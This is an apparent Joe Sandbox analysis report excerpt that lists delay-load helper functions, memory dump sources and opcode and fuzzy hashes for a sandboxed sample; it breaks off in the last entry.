                                    Function 0035D92E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 48d3b35c884045a43d87c541a064734ef50a78379b87e53dd445658dda7d2b72
                                    • Instruction ID: 71a59d8043ca26a95383432d29f69d51048f965d8fa274d269a677a0dab4d556
                                    • Opcode Fuzzy Hash: 48d3b35c884045a43d87c541a064734ef50a78379b87e53dd445658dda7d2b72
                                    • Instruction Fuzzy Hash: 3DB0129526C001AD313F6218AC06E3702ACC4C2B13330C02AFD0ED40D0D5405C0D0931
                                    Function 0035D910 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: b1f023de4d970e697e561bd3ce960a2611fd152152ca178fc89d8a2fec6ec3c0
                                    • Instruction ID: a80c9d1d3e928ab71d2889f6e418e07bbf5c622e913948e667b749bd8041c1db
                                    • Opcode Fuzzy Hash: b1f023de4d970e697e561bd3ce960a2611fd152152ca178fc89d8a2fec6ec3c0
                                    • Instruction Fuzzy Hash: ECB012A926D101AD31BB6308AC06E37026EC4C1B13330811AF80ED40D0D4405C4C0831
                                    Function 0035D906 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: d2d03f5bddd2e43f69af724a6a2d8311b3730ff9a8ac58bceff7e4c649267570
                                    • Instruction ID: 5f8395c6ca8af54885581b90cb29f1353302dbb2e78914b5286d4e7f39dc1da6
                                    • Opcode Fuzzy Hash: d2d03f5bddd2e43f69af724a6a2d8311b3730ff9a8ac58bceff7e4c649267570
                                    • Instruction Fuzzy Hash: FBB0129526D001AD317B6308AC06E37026EC4C2B13330C01AFC0ED40D0D4405C0D1831
                                    Function 0035D942 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 9b68c0c15f78e64065857c40f07d93db378caadc2f8315c0d728c3c595eb3652
                                    • Instruction ID: 6ab16a5695f3015aa9afa66f18412b81b8f18136547023accb58420a283748d1
                                    • Opcode Fuzzy Hash: 9b68c0c15f78e64065857c40f07d93db378caadc2f8315c0d728c3c595eb3652
                                    • Instruction Fuzzy Hash: 92B012A536C001AD313F6208AD06E3702ECC4C1B13330802AFC0ED40D0D4405C0D0931
                                    Function 0035D8D9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 0853a74e69355f9760eb3f7d97a22e597cd406c06b0cd75bf349ebc1f6c72e3a
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 0853a74e69355f9760eb3f7d97a22e597cd406c06b0cd75bf349ebc1f6c72e3a
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D93D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: f54973745a1d18bdf4b8d510876895070dba0d10846b593633ba8d9a63fc37a6
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: f54973745a1d18bdf4b8d510876895070dba0d10846b593633ba8d9a63fc37a6
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D91F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: d7da39127e8e2a129376600e0d991a7e882de0d32172510dba3d334cfa1dcb60
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: d7da39127e8e2a129376600e0d991a7e882de0d32172510dba3d334cfa1dcb60
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D979 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 3a5df007f2261f66b9ebfc07c7d07e6cd6b9a54bf97ee7225d9e748d2233339a
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 3a5df007f2261f66b9ebfc07c7d07e6cd6b9a54bf97ee7225d9e748d2233339a
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D965 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: b48362a2d9b3f279990df7b008589d461ce8f8a924ec619bac8bf0421b0287bf
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: b48362a2d9b3f279990df7b008589d461ce8f8a924ec619bac8bf0421b0287bf
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D96F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: d31928320f5eff456f19f61f894514b9b7db8a4210e140b4ac7f639a3ecc0784
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: d31928320f5eff456f19f61f894514b9b7db8a4210e140b4ac7f639a3ecc0784
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D951 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 28a55dccf0bf49b18d6b280f0d1c03654aa66e3be76d67d9f875588a18815b2a
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 28a55dccf0bf49b18d6b280f0d1c03654aa66e3be76d67d9f875588a18815b2a
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D95B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 6d505c7ad0beb02b2852ebe81a460b89c3201d9e87dbf5a31a6ad710e64c80a0
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 6d505c7ad0beb02b2852ebe81a460b89c3201d9e87dbf5a31a6ad710e64c80a0
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D997 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 1ce6cbfe123d8df774b8602e4201ee145c23de3797aedf99fd6e046e1a0f64bb
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 1ce6cbfe123d8df774b8602e4201ee145c23de3797aedf99fd6e046e1a0f64bb
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D983 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 8b58159552fbfb467f37454c5ab0a3b000d617c88f6d31d9f274526d4046009e
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
                                    • Opcode Fuzzy Hash: 8b58159552fbfb467f37454c5ab0a3b000d617c88f6d31d9f274526d4046009e
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0035D98D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0035D8A3
                                      • Part of subcall function 0035DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0035DFD6
                                      • Part of subcall function 0035DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0035DFE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                    • String ID: I=u
                                    • API String ID: 1269201914-3032091488
                                    • Opcode ID: 81c363b79ee68f335f4dec3db36d0c3dbe85684283902a5576e07fc2673e38a2
                                    • Instruction ID: 4de6a07d1efd2f3111f28f5cf6ec14bda38f51c5f5de650f222fb25beb32fbf4
